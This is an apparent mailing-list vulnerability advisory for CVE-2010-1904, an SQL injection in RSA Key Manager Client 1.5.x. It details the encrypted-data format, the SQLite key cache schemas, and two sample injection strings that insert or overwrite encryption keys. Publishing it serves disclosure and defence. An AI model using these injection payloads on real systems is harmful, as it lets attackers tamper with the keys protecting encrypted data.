RSA Key Manager SQL injection Vulnerability ( CVE-2010-1904 )
Product: RSA Key Manager
Vendor: EMC/RSA
Vulnerable Component: Key Manager Client
Vulnerable Component Version: 1.5.x
Vulnerability Type: SQL injection
Vendor Contact Date: 4/20/2010
Status: Vendor does not want to fix the vulnerability.
Vulnerability Details:
RSA Key Manager Client software uses an SQLite database to cache its encryp=
tion keys.=A0The software fails to properly validate the metadata embedded =
inside of the RSA Key Manager=A0encrypted data when it perform a key lookup=
when the encrypted data is being decrypted.An attacker can inject SQL comm=
ands into the metadata section of the RSA Key Manager=A0encrypted data=2C w=
hich will be executed by the Key Manager Client software.=A0For example=2C =
an attacker can inject SQL statements to modify existing encryption keys=2C=
=A0remove existing encryption keys=2C add new encryption keys=2C etc.
The Key Manager client uses two types of cache: memory cache and file cache=
..=A0As long as both or either of the caches are enabled the problem can be =
triggered easily.=A0
RSA Key Manager Client 1.5.x uses the following format when it encrypts dat=
a:
Field 1 =3D KeyIdStringField 2 =3D NULL TerminatorField 3 =3D Encryption IV=
Field 4 =3D Encrypted Data
Encryptionn Key Cache tables:
1. "ClassTable" [contains encryption key classes configured on the server]
classID =A0 =A0 VARCHAR(255) PRIMARY KEYkeyID =A0 =A0 =A0 VARCHAR(255) [cur=
rent key id for this key class]refreshTime INT UNSIGNEDupdateTime =A0INT UN=
SIGNED
2. "ConfigTable" [includes kekhash - KEK=2C Key Encryption Key=2C hash]
name VARCHAR(255) PRIMARY KEYvalue VARCHAR(255)
3. "KeyTable" [holds the cached encryption keys]
keyID =A0 =A0 =A0 VARCHAR(255) PRIMARY KEYclassID =A0 =A0 VARCHAR(255)keyDa=
ta =A0 =A0 BLOBalgorithm =A0 VARCHAR(255) [usually "AES/CBC"]refreshTime IN=
T UNSIGNEDupdateTime =A0INT UNSIGNED
Sample Injections:
Injecting the following sql code results in a new encryption key in the Key=
Manager (client).
"=3B INSERT INTO KeyTable VALUES('1111'=2C'MyClass'=2C'MyKeyData'=2C'ABC'=
=2C1000=2C2000)=3B--
Injecting something like the sql code below can be used to replace=A0the en=
cryption keys used by Key Manager.
"=3B UPDATE KeyTable SET keyData =3D'NewKeyData' WHERE classID=3D'MyClass'=
=3B--
=20
_________________________________________________________________
Hotmail is redefining busy with tools for the New Busy. Get more from your =
inbox.
http://www.windowslive.com/campaign/thenewbusy?ocid=3DPID28326::T:WLMTAGL:O=
N:WL:en-US:WM_HMP:042010_2=